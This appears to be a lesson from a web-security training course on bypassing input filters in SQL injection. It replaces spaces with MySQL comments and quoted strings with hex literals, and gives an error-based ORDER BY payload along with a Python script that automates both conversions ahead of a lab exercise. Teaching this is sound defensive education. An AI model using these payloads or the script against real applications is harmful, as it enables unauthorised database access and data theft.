What if character X cannot be used?
After discovering a vulnerability, you often run into obstacles when trying to exploit it: filters, blocklists and other input restrictions. That is why hackers have to be resourceful!
Replacing Whitespace with Comments
Let's take spaces as an example. How can a SQL injection vulnerability be exploited if the vulnerable parameter of the application does not accept any spaces?
One solution is comments! How helpful comments can be. Wouldn't it be fun if comments, reading information_schema, and other functions that are mostly beneficial to attackers were disabled by default, or at least could be turned off? But, let's stay on topic...
So comments, which can conveniently break SQL when injected into it, also work as handy replacements for spaces. MySQL treats the /**/ sequence (an empty multi-line comment) as whitespace, so SELECT/**/1 is parsed exactly like SELECT 1. Most other database engines treat comments the same way, but the rest of this module assumes MySQL.
Hexadecimal Literals
What if you want to use the error-based injection technique, but the < character, apostrophes and quotation marks are all blocked? How do you trigger the XML error as in the previous modules, where you did it like this: CONCAT("<", …)?
One option is to use the CONCAT function as before, but instead of the string "<", use the hexadecimal literal for the < character.
Instead of CONCAT("<", ...), write CONCAT(0x3c, ...). No <, ' or " characters needed! In MySQL, 0x3c is a hexadecimal literal: in string context (such as an argument to CONCAT) it is the one-byte string "<", while in numeric context it would be the integer 60.
Why 0x3c?
A value written as 0x followed by hex digits (0xSOMETHING) is hexadecimal. Hexadecimal just means a number represented in base 16. You are probably used to the decimal system, which has base 10. You have probably also heard of the binary system, which has base 2. The base just means how many fingers you have to count with. The same value can always be expressed in any base.
In the decimal system there are ten digits: 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9. After the number 8 comes 9, after 9 comes 10, and after 10 comes 11.
In a base-9 system there are nine digits: 0, 1, 2, 3, 4, 5, 6, 7, and 8. After 7 comes 8, after 8 comes 10, and after 10 comes 11. Note that the digit "9" is missing from the "alphabet" of the base-9 system. Base 9 is not used anywhere in practice; the point is only to show you that the binary, octal, decimal and hexadecimal systems are not fundamentally different from each other.
In the binary system, the base is 2, which means there are only two characters, 0 and 1. After 0, comes 1, and after 1 comes 10, after 10 comes 11, and after 11 comes 100.
In the hexadecimal system, the base number is 16, which means that it has 16 characters: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, and F. After 8, comes 9, after 9 comes A, after A comes B, and later, after F comes 10. Therefore, in the decimal system, the number 10 is represented as A in hexadecimal, and the number represented in hexadecimal as 10 corresponds to the decimal number 16.
But why exactly 0x3c? 3C in hexadecimal is 3 × 16 + C (12) = 48 + 12 = 60. In the ASCII character set, code 60 is... drum roll... <.
What is the ASCII character set?
ASCII is an international standard that defines 128 characters. Almost any programming language, including query languages such as SQL, can convert an ASCII code (such as the number 65) to its corresponding character (such as the letter A) and vice versa. You can read about the ASCII character set here: https://en.wikipedia.org/wiki/ASCII
Example
Let's say you want to send something like this to the application:
ORDER BY 1,(SELECT(CONCAT('<',@@version)))
However, you must not use spaces, so you replace them with comments.
ORDER/**/BY/**/1,(SELECT(CONCAT('<',@@version)))
You are also not allowed to use string literals (apostrophes or quotation marks), so keep the CONCAT function and replace the quoted string with its hex literal. The same works for longer strings: one pair of hex digits per byte, so 'abc' becomes 0x616263.
ORDER/**/BY/**/1,(SELECT(CONCAT(0x3c,@@version)))
You can also do this automatically with Hakatemia's Transformer tool, using the Space2Comment and Str2Hex conversions.
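As an added example (this is not Hakatemia's Transformer tool and not code from the original module), here is a small Python reimplementation of the two conversions, Str2Hex and Space2Comment, together with a check that the transformed payload no longer contains any blocked character and a decoder that turns a hex literal back into text, which is how 0x3c maps to <. The function names, the default blocked-character set and the regex for string literals are assumptions made for this example; the regex assumes string literals contain no escaped quotes.

```python
import re

# Single- or double-quoted string literal. Assumption (example-only): no
# escaped quotes inside the literal, so 'it''s' and 'a\'b' are not handled.
_STRING_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def space2comment(payload: str) -> str:
    """Replace every space with an empty block comment.

    MySQL treats /**/ as whitespace, so ORDER/**/BY parses like ORDER BY.
    """
    return payload.replace(" ", "/**/")


def str2hex(payload: str) -> str:
    """Replace each quoted string literal with a MySQL hexadecimal literal.

    '<' becomes 0x3c and 'abc' becomes 0x616263: one pair of hex digits per
    byte of the UTF-8 encoding. In string context (e.g. inside CONCAT) MySQL
    reads 0x616263 as the string 'abc'.
    """
    def replace(match: re.Match) -> str:
        text = match.group(1) if match.group(1) is not None else match.group(2)
        if text == "":
            return match.group(0)  # a bare 0x is not a valid literal; keep ''
        return "0x" + text.encode("utf-8").hex()

    return _STRING_LITERAL.sub(replace, payload)


def hex_literal_to_str(literal: str) -> str:
    """Decode a 0x... literal back to the text MySQL sees in string context."""
    if not literal.startswith("0x") or len(literal) % 2 != 0:
        raise ValueError(f"not a valid hex literal: {literal!r}")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def transform(payload: str, blocked: str = " '\"<") -> str:
    """Apply Str2Hex and then Space2Comment, then verify the blocklist.

    Str2Hex runs first on purpose: a space inside a string literal must end up
    inside the hex literal, not be turned into a comment that changes the
    string's value. Any blocked character left outside a literal (such as a
    bare < in 1<2) cannot be hidden this way, so it is reported instead.
    """
    result = space2comment(str2hex(payload))
    remaining = sorted({c for c in result if c in blocked})
    if remaining:
        raise ValueError(f"blocked characters still present: {remaining!r}")
    return result


if __name__ == "__main__":
    original = "ORDER BY 1,(SELECT(CONCAT('<',@@version)))"
    print(transform(original))
    # ORDER/**/BY/**/1,(SELECT(CONCAT(0x3c,@@version)))
    print(hex_literal_to_str("0x3c"))  # <
```

The order of the two conversions matters: hex-encoding the literals first keeps any spaces inside them as part of the string, whereas running Space2Comment first would silently rewrite 'a b' into 'a/**/b'. The final blocklist check is the part you want before sending a payload: it tells you when a forbidden character sits outside a string literal, where neither trick can hide it.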
Exercise
Equipped with these techniques, try to solve the exercise below! Not all characters are allowed, but otherwise the task is identical to the previous module, which dealt with the ORDER BY error-based technique.